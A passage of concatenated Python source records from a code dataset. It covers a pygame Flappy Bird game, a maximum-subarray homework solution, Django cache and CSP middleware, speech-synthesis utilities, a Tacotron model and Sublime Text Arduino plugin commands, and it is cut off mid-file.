pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 60)\n font2 = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 50)\n scoretext = font.render( 'YOUR RESULT: '+str(self.game.score), 1, (0, 0, 0))\n if self.game.SCORE > self.highscores[0]:\n self.WINDOW.blit(font2.render('new high score! ' + str(self.game.SCORE) + ' !!!', 1, (0, 0, 0)), (self.SCREEN_WIDTH // 2 - 120, 150))\n else:\n self.WINDOW.blit(scoretext, (self.SCREEN_WIDTH // 2 - 200, 50 ))\n\n self.WINDOW.blit(font2.render( str(self.highscores[0]), 1, (255,215,0)), (self.SCREEN_WIDTH // 2 - 10, 190))\n self.WINDOW.blit(font2.render( str(self.highscores[1]), 1, (212,212,212)), (self.SCREEN_WIDTH // 2 - 60, 240))\n self.WINDOW.blit(font2.render( str(self.highscores[2]), 1, (204, 153, 0)), (self.SCREEN_WIDTH // 2 + 50, 240))\n\n\ndef run():\n i = GameIntro('FLAPPY BIRD', 1280, 720)\n\n if i.MUSIC:\n pygame.mixer.init()\n pygame.mixer.pre_init()\n pygame.init()\n pygame.mixer.music.load(os.path.join('music', 'flappybirdsong.mp3'))\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1)\n\n g = Game('FLAPPY BIRD',1280,720,i)\n e = EndScreen('FLAPPY BIRD - END',1280,720,g,i)\n while e.TRY_AGAIN:\n g = Game('FLAPPY BIRD', 1280, 720, i)\n e = EndScreen('FLAPPY BIRD - END', 1280, 720, g, i)\n pygame.quit()\n\nrun()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"70080652","text":"__author__ = 'Lorenzo'\n\n\ndef main():\n array = [31, -41, 59, 26, -53, 58, 97, -93, -23, 84]\n print(sum_max_contig(array))\n\n\ndef sum_max_contig(array):\n # Initialize jump\n jump = 0\n\n # Initialize n x 1 DP table\n C = []\n\n # Begin recursion\n for i in range(len(array)):\n if i == 0: # Base case\n C.append(array[i])\n elif array[i] < 0:\n C.append(C[i - 1])\n jump += 1\n elif array[i] >= 0:\n C.append(max(\n array[i],\n C[i - 1 - jump] + sum_skipped(array, i, jump) + array[i],\n C[i-1]\n ))\n jump = 0\n\n return C[len(array) - 1]\n\n\ndef sum_skipped(array, index, jump):\n sum = 0\n for j in range(index - jump, index):\n sum += array[j]\n return sum\n\nmain()","sub_path":"HW5/sum_max_contig_B.py","file_name":"sum_max_contig_B.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"364936548","text":"class DownstreamCacheControlMiddleware(object):\n def process_response(self, request, response):\n if 'CSRF_COOKIE_USED' in request.META:\n response['Edge-Control'] = 'no-store'\n return response\n\n\nclass CSPScriptHashMiddleware(object):\n def process_response(self, request, response):\n if hasattr(request, 'script_hashes'):\n for header in ('content-security-policy',\n 'content-security-policy-report-only'):\n if header in response._headers:\n csp_name, csp = response._headers[header]\n hashes = ' '.join(request.script_hashes)\n csp = csp.replace('script-src', 'script-src ' + hashes)\n\n response._headers[header] = (csp_name, csp)\n\n return response\n","sub_path":"cfgov/core/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"362060228","text":"import json\nimport os, sys\nfrom collections import defaultdict\n\nFALCON_DIR = os.environ.get('FALCONDIR')\nsys.path.append(FALCON_DIR)\nimport librosa\nfrom sklearn.manifold import TSNE\nfrom hyperparameters import hparams\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom scipy import signal\nfrom scipy.io import wavfile\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torch import nn\n\n\ndef populate_phonesarray(fname, feats_dir, feats_dict):\n if feats_dict is None:\n print(\"Expected a feature dictionary\")\n sys.exit()\n\n feats_array = []\n f = open(fname)\n for line in f:\n line = line.split('\\n')[0].split()\n feats = [feats_dict[phone] for phone in line]\n feats = np.array(feats)\n return feats\n\n\ndef learning_rate_decay(init_lr, global_step):\n warmup_steps = 4000.0\n step = global_step + 1.\n lr = init_lr * warmup_steps ** 0.5 * np.minimum(\n step * warmup_steps ** -1.5, step ** -0.5)\n return lr\n\n\ndef get_fnames(fnames_file):\n filenames_array = []\n f = open(fnames_file)\n for line in f:\n line = line.split('\\n')[0]\n filenames_array.append(line)\n return filenames_array\n\n\ndef get_featmetainfo(desc_file, feat_name):\n f = open(desc_file)\n for line in f:\n line = line.split('\\n')[0]\n feat = line.split('|')[0]\n if feat_name == feat:\n feat_length, feat_type = line.split('|')[1], line.split('|')[2]\n return feat_length, feat_type\n\n\nclass FloatDataSource(Dataset):\n \"\"\"\n Syntax\n dataset = FloatDataSource(fnames.txt.train, etc/falcon_feats.desc, feat_name, feats_dir)\n \"\"\"\n\n def __init__(self, fnames_file, desc_file, feat_name, feats_dir, feats_dict=None):\n self.fnames_file = fnames_file\n self.feat_name = feat_name\n self.desc_file = desc_file\n self.filenames_array = get_fnames(self.fnames_file)\n self.feat_length, self.feat_type = get_featmetainfo(self.desc_file, feat_name)\n self.feats_dir = feats_dir\n self.feats_dict = defaultdict(lambda: len(self.feats_dict)) if feats_dict is None else feats_dict\n\n def __getitem__(self, idx):\n\n fname = self.filenames_array[idx]\n if self.feat_name == 'f0':\n fname = self.feats_dir + '/' + fname.strip() + '.feats'\n feats_array = np.loadtxt(fname)\n\n else:\n fname = self.feats_dir + '/' + fname.strip() + '.feats.npy'\n feats_array = np.load(fname)\n return feats_array\n\n def __len__(self):\n return len(self.filenames_array)\n\n\nclass AudioSearchDataset(object):\n def __init__(self, Mel):\n self.Mel = Mel\n\n def __getitem__(self, idx):\n mel = self.Mel[idx]\n idx_random = np.random.randint(len(self.Mel))\n return mel, self.Mel[idx_random]\n\n def __len__(self):\n return len(self.Mel)\n\n\ndef collate_fn_audiosearch(batch):\n \"\"\"Create batch\"\"\"\n\n query_length = 200 # keeping fixed for now and assuming that audio length is atleast 100\n search_audio_lengths = [len(x[0]) for x in batch]\n max_audio_len = np.max(search_audio_lengths) + 1\n # is it good to pad and then extract query? if the difference between lengths is large, padding will be really bad,\n # also should we try edge padding instead of constant padding\n search = np.array([_pad_2d(x[0], max_audio_len) for x in batch], dtype=np.float)\n min_audio_len = np.min(search_audio_lengths)\n t = 4\n assert min_audio_len >= query_length\n search_batch = torch.FloatTensor(search)\n pos_queries = []\n for i in range(t):\n if min_audio_len == query_length:\n pos_query_start_idx = 0\n else:\n pos_query_start_idx = np.random.randint(min_audio_len - query_length)\n pos_query = search_batch[:, pos_query_start_idx: pos_query_start_idx + query_length]\n pos_queries.append(pos_query)\n\n t = 8\n query_length = np.random.randint(50, 200)\n neg_audio_lengths = [len(x[1]) for x in batch]\n max_neg_audio_len = np.max(neg_audio_lengths) + 1\n neg_query = np.array([_pad_2d(x[1], max_neg_audio_len) for x in batch], dtype=np.float)\n neg_query_batch = torch.FloatTensor(neg_query)\n min_neg_audio_len = np.min(neg_audio_lengths)\n # print(\"min_neg_audio_len\", min_neg_audio_len)\n assert min_neg_audio_len >= query_length\n neg_queries = []\n for i in range(t):\n if min_neg_audio_len == query_length:\n neg_query_start_idx = 0\n else:\n neg_query_start_idx = np.random.randint(min_neg_audio_len - query_length)\n neg_query = neg_query_batch[:, neg_query_start_idx: neg_query_start_idx + query_length]\n neg_queries.append(neg_query)\n return search_batch, pos_queries, neg_queries\n\n\ndef _pad(seq, max_len):\n # print(\"Shape of seq: \", seq.shape, \" and the max length: \", max_len)\n assert len(seq) < max_len\n # constant padding\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=0)\n\n\ndef _pad_2d(seq, max_len):\n # print(\"Shape of seq: \", seq.shape, \" and the max length: \", max_len)\n assert len(seq) < max_len\n # constant padding\n x = np.pad(seq, [(0, max_len - len(seq)), (0, 0)],\n mode=\"constant\", constant_values=0)\n return x\n\n\ndef data_parallel_workaround(model, input):\n device_ids = list(range(torch.cuda.device_count()))\n output_device = device_ids[0]\n replicas = torch.nn.parallel.replicate(model, device_ids)\n inputs = torch.nn.parallel.scatter(input, device_ids)\n replicas = replicas[:len(inputs)]\n outputs = torch.nn.parallel.parallel_apply(replicas, inputs)\n y_hat = torch.nn.parallel.gather(outputs, output_device)\n return y_hat, outputs, replicas\n\n\ndef save_wav(wav, path):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, hparams.sample_rate, wav.astype(np.int16))\n\n\ndef plot_alignment(alignment, path, info=None):\n fig, ax = plt.subplots()\n im = ax.imshow(\n alignment,\n aspect='auto',\n origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n plt.savefig(path, format='png')\n\n\ndef save_alignment(path, attn, global_step):\n plot_alignment(attn.T, path, info=\"tacotron, step={}\".format(global_step))\n\n\ndef denormalize(S):\n return (np.clip(S, 0, 1) * -hparams.min_level_db) + hparams.min_level_db\n\n\ndef save_spectrogram(path, linear_output):\n spectrogram = denormalize(linear_output)\n plt.figure(figsize=(16, 10))\n plt.imshow(spectrogram.T, aspect=\"auto\", origin=\"lower\")\n plt.colorbar()\n plt.tight_layout()\n plt.savefig(path, format=\"png\")\n plt.close()\n\n\ndef _db_to_amp(x):\n return np.power(10.0, x * 0.05)\n\n\ndef inv_preemphasis(x):\n return signal.lfilter([1], [1, -hparams.preemphasis], x)\n\n\ndef _stft_parameters():\n n_fft = (hparams.num_freq - 1) * 2\n hop_length = int(hparams.frame_shift_ms / 1000 * hparams.sample_rate)\n win_length = int(hparams.frame_length_ms / 1000 * hparams.sample_rate)\n return n_fft, hop_length, win_length\n\n\ndef _istft(y):\n _, hop_length, win_length = _stft_parameters()\n return librosa.istft(y, hop_length=hop_length, win_length=win_length)\n\n\ndef _stft(y):\n n_fft, hop_length, win_length = _stft_parameters()\n return librosa.stft(y=y, n_fft=n_fft, hop_length=hop_length, win_length=win_length)\n\n\ndef _griffin_lim(S):\n \"\"\"\n librosa implementation of Griffin-Lim\n Based on https://github.com/librosa/librosa/issues/434\n \"\"\"\n angles = np.exp(2j * np.pi * np.random.rand(*S.shape))\n S_complex = np.abs(S).astype(np.complex)\n y = _istft(S_complex * angles)\n for i in range(hparams.griffin_lim_iters):\n angles = np.exp(1j * np.angle(_stft(y)))\n y = _istft(S_complex * angles)\n return y\n\n\ndef inv_spectrogram(spectrogram):\n \"\"\"Converts spectrogram to waveform using librosa\"\"\"\n S = _db_to_amp(denormalize(spectrogram) + hparams.ref_level_db) # Convert back to linear\n return inv_preemphasis(_griffin_lim(S ** hparams.power)) # Reconstruct phase\n\n\ndef save_states(global_step, mel_outputs, linear_outputs, attn, y,\n input_lengths, checkpoint_dir=None):\n step = str(global_step).zfill(7)\n print(\"Save intermediate states at step {}\".format(step))\n\n idx = 0\n\n # Alignment\n path = os.path.join(checkpoint_dir, \"step{}_alignment.png\".format(step))\n\n alignment = attn[idx].cpu().data.numpy()\n save_alignment(path, alignment, step)\n\n # Predicted spectrogram\n path = os.path.join(checkpoint_dir, \"step{}_predicted_spectrogram.png\".format(step))\n linear_output = linear_outputs[idx].cpu().data.numpy()\n save_spectrogram(path, linear_output)\n\n # Predicted audio signal\n signal = inv_spectrogram(linear_output.T)\n path = os.path.join(checkpoint_dir, \"step{}_predicted.wav\".format(step))\n save_wav(signal, path)\n\n # Target spectrogram\n path = os.path.join(checkpoint_dir, \"step{}_target_spectrogram.png\".format(step))\n linear_output = y[idx].cpu().data.numpy()\n save_spectrogram(path, linear_output)\n\n # Target audio signal\n signal = inv_spectrogram(linear_output.T)\n path = os.path.join(checkpoint_dir, \"step{}_target.wav\".format(step))\n save_wav(signal, path)\n\ndef save_checkpoint(model, optimizer, step, checkpoint_dir, epoch, spk_flag=None):\n step = str(step).zfill(7)\n checkpoint_path = os.path.join(\n checkpoint_dir, \"checkpoint_step{}.pth\".format(step))\n torch.save({\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n \"global_step\": step,\n \"global_epoch\": epoch,\n }, checkpoint_path)\n print(\"Saved checkpoint:\", checkpoint_path)\n\n # Speaker Embedding\n if spk_flag:\n visualize_speaker_embeddings(model, checkpoint_dir, step)\n\n#### Visualization Stuff\n\ndef visualize_phone_embeddings(model, checkpoints_dir, step):\n print(\"Computing TSNE\")\n phone_embedding = model.embedding\n phone_embedding = list(phone_embedding.parameters())[0].cpu().detach().numpy()\n phone_embedded = TSNE(n_components=2, verbose=1, perplexity=40, n_iter=300).fit_transform(phone_embedding)\n\n with open(checkpoints_dir + '/ids_phones.json') as f:\n phones_dict = json.load(f)\n\n ids2phones = {v: k for (k, v) in phones_dict.items()}\n phones = list(phones_dict.keys())\n y = phone_embedding[:, 0]\n z = phone_embedding[:, 1]\n\n fig, ax = plt.subplots()\n ax.scatter(y, z)\n\n for i, phone in enumerate(phones):\n ax.annotate(phone, (y[i], z[i]))\n\n path = checkpoints_dir + '/step' + str(step) + '_embedding_phones.png'\n plt.tight_layout()\n plt.savefig(path, format=\"png\")\n plt.close()\n\n\ndef visualize_latent_embeddings(model, checkpoints_dir, step):\n return\n print(\"Computing TSNE\")\n latent_embedding = model.quantizer.embedding0.squeeze(0).detach().cpu().numpy()\n num_classes = model.num_classes\n\n ppl_array = [5, 10, 40, 100, 200]\n for ppl in ppl_array:\n\n embedding = TSNE(n_components=2, verbose=1, perplexity=ppl).fit_transform(latent_embedding)\n\n y = embedding[:, 0]\n z = embedding[:, 1]\n\n fig, ax = plt.subplots()\n ax.scatter(y, z)\n\n for i in range(num_classes):\n ax.annotate(i, (y[i], z[i]))\n\n path = checkpoints_dir + '/step' + str(step) + '_latent_embedding_perplexity_' + str(ppl) + '.png'\n plt.tight_layout()\n plt.savefig(path, format=\"png\")\n plt.close()\n\n\ndef return_classes(logits, dim=-1):\n _, predicted = torch.max(logits, dim)\n return predicted.view(-1).cpu().numpy()\n\n\nclass ContrastiveLoss(nn.Module):\n \"\"\"\n Contrastive loss\n Takes embeddings of two samples and computes loss\n \"\"\"\n\n def __init__(self, margin):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n self.eps = 1e-9\n\n def forward(self, output1, output2, class_labels_1, class_labels_2):\n # distances = (output2 - output1).pow(2).sum(1) # squared distances\n # losses = 0.5 * (target.float() * distances +\n # (1 + -1 * target).float() * F.relu(self.margin - (distances + self.eps).sqrt()).pow(2))\n # return losses.mean()\n label_batch = (class_labels_1 != class_labels_1).cuda().float() # 0: similar pair, 1: different pair\n euclidean_distance = F.pairwise_distance(output1, output2)\n loss = torch.mean((1 - label_batch) * torch.pow(euclidean_distance, 2) +\n label_batch * torch.pow(torch.clamp(self.margin - euclidean_distance, min=0.0), 2))\n return loss","sub_path":"local/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615674067","text":"#-*- coding: utf-8 -*-\nimport random,sys,os,torch\nfrom torch import nn\nimport models.Tacotron.hyperparams as hp\nfrom modules.Tacotron_modules import *\nfrom modules.Sequential_modules import BaseEncoder\n\nclass CHBGEncoder(nn.Module):\n \"\"\"\n Encoder\n \"\"\"\n def __init__(self, embed_size,hidden_size):\n \"\"\"\n\n :param embed_size: dimension of embedding\n \"\"\"\n super(CHBGEncoder, self).__init__()\n self.prenet = Prenet(hp.embed_size, hp.hidden_size * 2, hp.hidden_size)\n self.cbhg = CBHG(hp.hidden_size)\n\n def forward(self, input_):\n\n input_ = torch.transpose(input_,1,2)\n prenet = self.prenet.forward(input_)\n memory = self.cbhg.forward(prenet)\n return memory\n\nclass MelDecoder(nn.Module):\n \"\"\"\n Decoder\n \"\"\"\n def __init__(self,hidden_size,num_mels,outputs_per_step):\n super(MelDecoder, self).__init__()\n self.prenet = Prenet(num_mels,hidden_size * 2, hidden_size)\n self.attn_decoder = AttentionDecoder(hidden_size * 2,num_mels,outputs_per_step)\n\n def forward(self, decoder_input, memory,teacher_forcing_ratio):\n\n # Initialize hidden state of GRUcells\n attn_hidden, gru1_hidden, gru2_hidden = self.attn_decoder.inithidden(memory.size(0))\n outputs = list()\n att_score= list()\n stop_targets=list()\n # Training phase\n if self.training and decoder_input is not None:\n # Prenet\n dec_input = self.prenet.forward(decoder_input)\n timesteps = dec_input.size()[2] // hp.outputs_per_step\n\n # [GO] Frame\n prev_output = dec_input[:, :, 0]\n\n for i in range(timesteps):\n\n prev_output,stop, attn_hidden, gru1_hidden, gru2_hidden,attn_weights = self.attn_decoder.forward(prev_output, memory,\n attn_hidden=attn_hidden,\n gru1_hidden=gru1_hidden,\n gru2_hidden=gru2_hidden)\n\n outputs.append(prev_output)\n att_score.append(attn_weights)\n stop_targets.append(stop)\n if random.random() < teacher_forcing_ratio:\n # Get spectrum at rth position\n prev_output = dec_input[:, :, i * hp.outputs_per_step]\n else:\n # Get last output\n prev_output = self.prenet.forward(prev_output[:, :, -1].unsqueeze(2)).squeeze(2)\n\n # Concatenate all mel spectrogram\n\n else:\n # [GO] Frame\n #import pdb; pdb.set_trace()\n prev_output = torch.zeros((memory.size(0),1,hp.num_mels)).cuda()\n\n for i in range(hp.max_iters):\n prev_output = self.prenet.forward(prev_output)\n prev_output = prev_output[:,:,0]\n prev_output, stop,attn_hidden, gru1_hidden, gru2_hidden,attn_weights = self.attn_decoder.forward(prev_output, memory,\n attn_hidden=attn_hidden,\n gru1_hidden=gru1_hidden,\n gru2_hidden=gru2_hidden)\n\n outputs.append(prev_output)\n att_score.append(attn_weights)\n stop_targets.append(stop)\n if torch.max(stop).item()>0.5:\n break\n prev_output = prev_output[:, :, -1].unsqueeze(2)\n\n #import pdb; pdb.set_trace()\n outputs = torch.cat(outputs, 2)\n att_score= torch.cat(att_score, 2)\n stop_targets=torch.cat(stop_targets,2)\n return outputs,stop_targets,att_score\n\nclass PostProcessingNet(nn.Module):\n \"\"\"\n Post-processing Network\n \"\"\"\n def __init__(self,hidden_size,num_mels,num_freq):\n super(PostProcessingNet, self).__init__()\n self.postcbhg = CBHG(hidden_size,\n K=8,\n projection_size=num_mels,\n is_post=True)\n self.linear = SeqLinear(hidden_size * 2,\n num_freq)\n\n def forward(self, input_):\n out = self.postcbhg.forward(input_)\n out = self.linear.forward(torch.transpose(out,1,2))\n\n return out\n\nclass Tacotron(nn.Module):\n \"\"\"\n End-to-end Tacotron Network\n \"\"\"\n def __init__(self,vocab_size):\n super(Tacotron, self).__init__()\n self.embed = nn.Embedding(vocab_size,hp.embed_size)\n if hp.enc_type==\"CHBG\":\n self.encoder = CHBGEncoder(hp.embed_size,hp.hidden_size)\n elif hp.enc_type==\"BASIC\":\n self.encoder = BaseEncoder(hp.embed_size,hp.hidden_size*2,hp.enc_drop,hp.bidirectional,hp.enc_rnn)\n #self.encoder = EncoderRNN(hp.embed_size,hp.hidden_size,hp.n_layers,hp.dropout)\n #import pdb; pdb.set_trace()\n # TODO: Fix tacotron net setting\n self.decoder1 = MelDecoder(hp.hidden_size,hp.num_mels,hp.outputs_per_step)\n #self.decoder2 = PostProcessingNet(hp.hidden_size,hp.num_mels,hp.num_freq)\n\n def forward(self, txt, mel_input=None,teacher_forcing_ratio=1.):\n #import pdb; pdb.set_trace()\n if isinstance(txt,torch.cuda.FloatTensor):\n if txt.dim()>2:\n embed=txt.bmm(self.embed.weight.unsqueeze(0).repeat(txt.size(0),1,1))\n else:\n embed=txt.mm(self.embed.weight)\n else:\n embed=self.embed(txt)\n\n\n memory = self.encoder.forward(embed)\n mel_out,stop_targets,att_score = self.decoder1.forward(mel_input, memory,teacher_forcing_ratio)\n #linear_output = self.decoder2.forward(mel_out)\n\n return mel_out, stop_targets,att_score,#linear_output\n def encode(self,txt):\n txt=self.embed(txt)\n memory = self.encoder.forward(txt)\n return memory\n def decode(self,memory,mel_input,teacher_forcing_ratio):\n mel_out,stop_targets,att_score = self.decoder1.forward(mel_input, memory,teacher_forcing_ratio)\n return mel_out,stop_targets,att_score\n def get_path(self):\n return hp.enc_type+\"_\"+hp.att_type+\"/\"+\"emb\"+str(hp.embed_size)+\"_hid\"+str(hp.hidden_size)+\"_depth\"+str(hp.n_layers)+\"/\"\n\nclass Vocoder(nn.Module):\n \"\"\"\n End-to-end Tacotron Network\n \"\"\"\n def __init__(self):\n super(Vocoder, self).__init__()\n self.decoder2 = PostProcessingNet(hp.hidden_size,hp.num_mels,hp.num_freq)\n self.drop =nn.Dropout(0.3)\n def forward(self,mel_input):\n linear_output = self.decoder2.forward(self.drop(mel_input))\n return linear_output\n\n def get_path(self):\n return hp.voc_type\n","sub_path":"models/Tacotron/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":6951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216592468","text":"#-*- coding: utf-8 -*-\n# stino/stcommands.py\n\nimport sublime\nimport sublime_plugin\nimport os\nimport stino\nimport time\n\nclass ShowFileExplorerPanelCommand(sublime_plugin.WindowCommand):\n\tdef run(self, top_path_list, condition_mod, condition_func, function_mod, function_func, \\\n\t\twith_files = True, with_button = False, extra_parameter = ''):\n\t\tself.level = 0\n\t\tself.top_path_list = top_path_list\n\t\tself.path_list = top_path_list\n\t\tself.condition_module = getattr(stino, condition_mod)\n\t\tself.condition_func = condition_func\n\t\tself.function_module = getattr(stino, function_mod)\n\t\tself.function_func = function_func\n\t\tself.with_files = with_files\n\t\tself.with_button = with_button\n\t\tself.extra_parameter = extra_parameter\n\n\t\tfile_list = stino.osfile.genFileListFromPathList(self.path_list, stino.cur_language)\n\t\tself.window.show_quick_panel(file_list, self.on_done)\n\n\tdef on_done(self, index):\n\t\tif index == -1:\n\t\t\treturn\n\n\t\tsel_path = self.path_list[index]\n\t\tif getattr(self.condition_module, self.condition_func)(sel_path):\n\t\t\tif self.extra_parameter:\n\t\t\t\tgetattr(self.function_module, self.function_func)(sel_path, self.extra_parameter)\n\t\t\telse:\n\t\t\t\tgetattr(self.function_module, self.function_func)(sel_path)\n\t\telse:\t\t\n\t\t\t(self.level, self.path_list) = stino.osfile.enterSubDir(self.top_path_list, \\\n\t\t\t\tself.level, index, sel_path, with_files = self.with_files, with_button = self.with_button)\n\t\t\tfile_list = stino.osfile.genFileListFromPathList(self.path_list, stino.cur_language)\n\t\t\tself.window.show_quick_panel(file_list, self.on_done)\n\nclass SelectItemCommand(sublime_plugin.WindowCommand):\n\tdef run(self, command, parent_mod, list_func, parameter1, parameter2, parameter3):\n\t\tparent_mod = getattr(stino, parent_mod) \n\t\tfunc = getattr(parent_mod, list_func)\n\t\tself.parameter1 = parameter1\n\t\tself.parameter2 = parameter2\n\t\tself.parameter3 = parameter3\n\t\tself.command = command\n\t\tif self.parameter1 and self.parameter3:\n\t\t\tself.info_list = func(self.parameter1, self.parameter2, self.parameter3)\n\t\telif self.parameter1:\n\t\t\tself.info_list = func(self.parameter1)\n\t\telse:\n\t\t\tself.info_list = func()\n\t\tif stino.utils.isLists(self.info_list):\n\t\t\tself.info_list = stino.utils.simplifyLists(self.info_list)\n\t\tself.window.show_quick_panel(self.info_list, self.on_done)\n\n\tdef on_done(self, index):\n\t\tif index == -1:\n\t\t\treturn\n\t\t\t\n\t\tsel_item = self.info_list[index]\n\t\tif self.parameter1 and self.parameter3:\n\t\t\tmenu_str = stino.utils.genKey(self.parameter2, self.parameter1)\n\t\t\tmenu_str = stino.utils.genKey(self.parameter3, menu_str)\n\t\t\tmenu_str = stino.utils.genKey(sel_item, menu_str)\n\t\telif self.parameter1:\n\t\t\tmenu_str = stino.utils.genKey(sel_item, self.parameter1)\n\t\telse:\n\t\t\tmenu_str = sel_item\n\n\t\tself.window.run_command(self.command, {'menu_str': menu_str})\n\nclass NotEnabledCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\treturn False\n\nclass SketchListener(sublime_plugin.EventListener):\n\tdef on_new(self, view):\n\t\tstino.const.settings.set('show_arduino_menu', False)\n\t\tstino.const.settings.set('show_serial_monitor_menu', False)\n\t\tstino.cur_menu.update()\n\t\tstino.serial_listener.stop()\n\t\tstino.status_info.setView(view)\n\t\tstino.status_info.update()\n\n\tdef on_activated(self, view):\n\t\tif not stino.stpanel.isPanel(view):\n\t\t\tpre_state = stino.const.settings.get('show_arduino_menu')\n\t\t\tfilename = view.file_name()\n\t\t\t\n\t\t\tsketch = view\n\t\t\tif filename:\n\t\t\t\tif not view.is_dirty():\n\t\t\t\t\tsketch = filename\n\n\t\t\tstate = stino.src.isSketch(sketch)\n\t\t\tif state:\n\t\t\t\tglobal_setting = stino.const.settings.get('global_setting')\n\t\t\t\tif not global_setting:\n\t\t\t\t\tpre_setting_folder_path = stino.const.settings.get('pre_setting_folder_path')\n\t\t\t\t\tfile_path = view.file_name()\n\t\t\t\t\tsetting_folder_path = os.path.split(file_path)[0]\n\t\t\t\t\t\n\t\t\t\t\tif setting_folder_path != pre_setting_folder_path:\n\t\t\t\t\t\tstino.const.settings.changeSettingFileFolder(setting_folder_path)\n\t\t\t\t\t\tstino.arduino_info.update()\n\t\t\t\t\t\tstino.cur_menu.fullUpdate()\n\t\t\t\t\t\tstino.const.settings.set('pre_setting_folder_path', setting_folder_path)\n\n\t\t\tif state != pre_state:\n\t\t\t\tstino.const.settings.set('show_arduino_menu', state)\n\t\t\t\tstino.cur_menu.update()\n\n\t\t\t\tif state:\n\t\t\t\t\tstino.serial_listener.start()\n\t\t\t\telse:\n\t\t\t\t\tstino.serial_listener.stop()\n\n\t\t\tpre_state = stino.const.settings.get('show_serial_monitor_menu')\n\t\t\tstate = stino.smonitor.isMonitorView(view)\n\t\t\tif state != pre_state:\n\t\t\t\tstino.const.settings.set('show_serial_monitor_menu', state)\n\t\t\t\tstino.cur_menu.update()\n\t\t\t\tview.window().run_command('send_to_serial')\n\n\t\t\tstino.status_info.setView(view)\n\t\t\tstino.status_info.update()\n\n\tdef on_close(self, view):\n\t\tif stino.smonitor.isMonitorView(view):\n\t\t\tname = view.name()\n\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\tif serial_port in stino.serial_port_monitor_dict:\n\t\t\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\t\t\tserial_monitor.stop()\n\t\t\t\tif serial_port in stino.serial_port_in_use_list:\n\t\t\t\t\tstino.serial_port_in_use_list.remove(serial_port)\n\nclass ShowArduinoMenuCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tshow_arduino_menu = not stino.const.settings.get('show_arduino_menu')\n\t\tstino.const.settings.set('show_arduino_menu', show_arduino_menu)\n\t\tstino.cur_menu.update()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu')\n\t\treturn state\n\nclass NewSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Name_for_new_sketch:)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\tself.window.show_input_panel(caption, '', self.on_done, None, None)\n\n\tdef on_done(self, input_text):\n\t\tif input_text:\n\t\t\tfilename = stino.osfile.regulariseFilename(input_text)\n\t\t\tif stino.osfile.existsInSketchbook(filename):\n\t\t\t\tdisplay_text = 'A sketch (or folder) named \"{1}\" already exists. Could not create the sketch.\\n'\n\t\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\t\tmsg = msg.replace('{1}', filename)\n\t\t\t\tstino.log_panel.addText(msg)\n\t\t\telse:\n\t\t\t\tstino.src.createNewSketch(filename)\n\t\t\t\tstino.arduino_info.sketchbookUpdate()\n\t\t\t\tstino.cur_menu.update()\n\nclass OpenSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t# sketchbook_root = stino.const.settings.get('sketchbook_root')\n\t\t# folder_path = os.path.join(sketchbook_root, menu_str)\n\t\tfolder_path = stino.arduino_info.getSketchPath(menu_str)\n\t\tif os.path.isdir(folder_path):\n\t\t\tstino.src.openSketch(folder_path)\n\t\telse:\n\t\t\tdisplay_text = 'The selected sketch no longer exists.\\nYou may need to restart Sublime Text 2\\nto update the sketchbook menu.\\n'\n\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\tstino.log_panel.addText(msg)\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass SelectExampleCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(example, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\texample_path = stino.arduino_info.getExamplePath(platform, example)\n\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':[example_path], \\\n\t\t\t\t'condition_mod':'arduino', 'condition_func':'isSketchFolder', 'function_mod':'src', \\\n\t\t\t\t'function_func':'openSketch'})\n\nclass NewToSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Name_for_new_file:)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\tself.window.show_input_panel(caption, '', self.on_done, None, None)\n\n\tdef on_done(self, input_text):\n\t\tif input_text:\n\t\t\tfilename = stino.osfile.regulariseFilename(input_text)\n\t\t\tview_file_name = self.window.active_view().file_name()\n\t\t\tfolder_path = os.path.split(view_file_name)[0]\n\t\t\tnew_file_path = os.path.join(folder_path, filename)\n\t\t\tif os.path.exists(new_file_path):\n\t\t\t\tdisplay_text = 'A file named \"{1}\" already exists. Could not create the file.\\n'\n\t\t\t\tmsg = 